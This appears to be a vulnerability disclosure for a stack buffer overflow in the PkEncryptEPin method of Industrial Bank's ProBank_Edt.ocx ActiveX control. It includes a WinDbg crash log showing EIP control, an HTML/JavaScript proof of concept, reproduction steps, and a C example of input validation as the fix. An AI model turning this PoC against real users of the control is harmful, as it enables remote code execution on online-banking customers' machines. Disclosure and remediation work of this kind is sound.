An ActiveX control distributed by Industrial Bank allows remote code execution.
The PkEncryptEPin method of Industrial Bank's ProBank_Edt.ocx control has a stack-based buffer overflow.
An oversized second argument overflows the stack buffer and EIP is overwritten with controlled data (0x41414141 in the crash below).
Download link for the password control: https://personalbank.cib.com.cn/pers/main/resources/js/CIB_Plugin.exe
Crashinfo:
ModLoad: 03750000 03764000   C:\PROGRA~1\PROBAN~1\PROBAN~1.OCX
ModLoad: 73d30000 73e2e000   C:\WINDOWS\system32\MFC42.DLL
ModLoad: 61be0000 61bed000   C:\WINDOWS\system32\MFC42LOC.DLL
(e10.1ec): Break instruction exception - code 80000003 (first chance)
eax=7ffde000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 edi=00000005
eip=7c92120e esp=036cffcc ebp=036cfff4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000246
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\ntdll.dll -
ntdll!DbgBreakPoint:
7c92120e cc              int     3
Missing image name, possible paged-out or corrupt data.
0:016> g
(e10.f14): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00004000 ebx=77c0f931 ecx=00000875 edx=020dd8dc esi=03878e40 edi=020e0000
eip=03755197 esp=020dd8b8 ebp=0387b030 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\PROGRA~1\PROBAN~1\PROBAN~1.OCX -
PROBAN_1!DllUnregisterServer+0x3127:
03755197 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
0:008> g
(e10.f14): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=7c9232bc esi=00000000 edi=00000000
eip=41414141 esp=020dd4e8 ebp=020dd508 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
<Unloaded_pi.dll>+0x41414140:
41414141 ??              ???
Vulnerability poc:
<object id='obj' classid='CLSID:{8BE81FD3-B85E-CD48-1179-1B592DDE9815}'></object>
<script>
argv1 = "A";
argv2 = "A";
while (argv2.length < 16384) argv2 += argv2;
ret = obj.PkEncryptEPin(argv1, argv2);
</script>
Demo process:
1. Install the control.
2. Set up a web server and open poc.html directly.
The WinDbg output above shows the crash information.
EIP is overwritten with 0x41414141, i.e. the ASCII bytes ('A', 0x41) of the second parameter.
Solution:
Strictly validate the input parameters (length and content) before they are used.
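As an added illustration of the fix (this is not the vendor's code), the following C function models the failing call with the validation the control lacked: the e-PIN is length-checked against the fixed stack buffer before any copy, so the PoC's 16384-byte input is rejected instead of reaching the copy loop. The buffer size, the digits-only allowlist and the function names are assumptions; the actual encryption step is not modelled.

```c
#include <stddef.h>
#include <string.h>
#define EPIN_MAX_LEN 64                 /* assumed maximum e-PIN length */
#define EPIN_BUF_SIZE (EPIN_MAX_LEN + 1)

enum epin_status { EPIN_OK = 0, EPIN_ERR_NULL = -1, EPIN_ERR_LENGTH = -2,
                   EPIN_ERR_BAD_CHAR = -3, EPIN_ERR_OUTPUT = -4 };

/* Bounded length: reads at most limit bytes, so oversized input costs O(limit). */
static size_t bounded_len(const char *s, size_t limit)
{
    size_t n = 0;
    while (n < limit && s[n] != '\0')
        n++;
    return n;
}

/* Hardened entry point (hypothetical): both parameters are validated before
 * anything is copied into the fixed stack buffer, which is the step the
 * crashing rep movs loop in the control skipped. */
int pk_encrypt_epin_checked(const char *key_id, const char *epin,
                            char *out, size_t out_len)
{
    char buf[EPIN_BUF_SIZE];            /* fixed-size stack buffer */
    size_t i, n;
    if (key_id == NULL || epin == NULL || out == NULL)
        return EPIN_ERR_NULL;
    n = bounded_len(epin, EPIN_BUF_SIZE);
    if (n == 0 || n >= EPIN_BUF_SIZE)
        return EPIN_ERR_LENGTH;         /* the PoC's 16 KiB string stops here */
    for (i = 0; i < n; i++)             /* assumed allowlist: decimal digits */
        if (epin[i] < '0' || epin[i] > '9')
            return EPIN_ERR_BAD_CHAR;
    if (out_len < n + 1)
        return EPIN_ERR_OUTPUT;
    memcpy(buf, epin, n);               /* safe: n < sizeof buf */
    buf[n] = '\0';
    memcpy(out, buf, n + 1);            /* validated PIN goes on to encryption */
    return EPIN_OK;
}

/* Feeds the PoC's input shape (16384 'A' bytes) to the checked version. */
int check_poc_input(void)
{
    static char big[16385];             /* last byte stays '\0' */
    char out[EPIN_BUF_SIZE];
    memset(big, 'A', 16384);
    return pk_encrypt_epin_checked("A", big, out, sizeof out);
}
```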